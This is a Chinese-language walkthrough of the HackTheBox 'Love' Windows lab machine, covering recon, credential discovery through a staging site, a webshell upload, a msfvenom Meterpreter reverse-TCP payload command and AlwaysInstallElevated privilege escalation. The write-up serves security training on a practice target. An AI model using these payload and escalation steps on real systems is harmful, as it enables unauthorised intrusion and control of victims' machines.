Hackthebox-love靶机实战

0x00 前言

love靶机是一台Windows机器，难度级别easy，官方评分4.4，主机ip为：10.10.10.239。

0x01 靶机实操

1.1信息搜集

1.1.1使用nmap进行端口探测

开放端口有80、135、139、443、445、3306、5000；其中80、443、5000存在web服务；

1.1.2使用dirb进行目录扫描

发现存在/admin目录和/images目录，且都可以被访问成功；

2.1渗透思路

2.1.1端口利用

访问80端口发现是一个登录框，尝试了一下万能密码，无果；

访问443和5000端口，一个是400，一个是403，好像都没用，就这么放弃？

怎么可能，根据443端口的提示，使用https访问443端口试试？变了，它变了，成为403了，好吧！我是个废物。

打算就此放弃端口信息的时候，某个giegie提示443端口还有东西。

在nmap扫描信息中发现443端口的ssl-cert处有提示一个域名：staging.love.htb。可以通过修改hosts文件将此域名解析的IP指向为靶场的IP来进行利用（又是一个小技巧）。

成功访问到此域名，又是一个web页面。

其中Home页面就是个登录页面，但是Demo页面需要指定一个URL去访问。

要不你先访问自己的IP试一下？可以成功访问哎；

这里又分别尝试443和5000端口，看能不能访问。其中443端口返回原页面，5000端口访问到了一个账户和密码（这是不是就可以利用起来了呢？）。

使用账号密码登录80端口的登录框，提示找不到此ID。再来试试/admin目录，因为它和80端口的登录界面简直就是一模一样，成功利用此账号密码登录。

2.1.2上传shell

因为Voters处可以上传文件，所以新建一个Voter来上传我们的木马文件；

在这里我们可以看到我们的shell已经被成功上传；

此时我们获得了一个交互式shell。

因为每5分钟会执行一次清理程序，将我们的webshell给清理掉，所以我们需要更换一个我们可以长期连接的shell。

这里我打算使用msf的shell，于是先用msfvenom生成一个exe的木马。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.4 lport=4444 -f exe -o shell.exe

这里我们需要在kail开启一个http服务，将kail生成的木马下载到目标机中，然后运行此木马。

我们的kail成功获取到回弹的shell。

此时我们获取到的权限为普通用户,因此只能得到普通用户处的flag。

这里我们需要提升权限才可以获得另一处的flag。

2.1.3权限提升

这里我们利用AlwaysInstallElevated提升权限。AlwaysInstallElevated是一个组策略配置，如果启用，那么将允许普通用户以SYSTEM权限运行安装文件。

(1)通过注册表的键值判断是否开启了alwaysinstallelevated。

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

（2）利用msfvenom生成一个msi马；并且开启监听；

（3）将msi马上传到目标，并运行；

（4）成功拿到system权限的shell;

（5）这里我们获取到另一处的flag

0x02 总结

1）在本文中提示的400错误可以根据提示尝试https访问，访问域名显示403错误的时候可以尝试爆破hosts,通过修改hosts文件来进行访问。不是所有的400错误都是不可利用的。

2）在利用上传的shell的时候经常返回不回数据，后来才发现它每5分钟会执行一次清理程序，将我们的webshell给清理掉。所以需要上传一个稍微稳定的shell。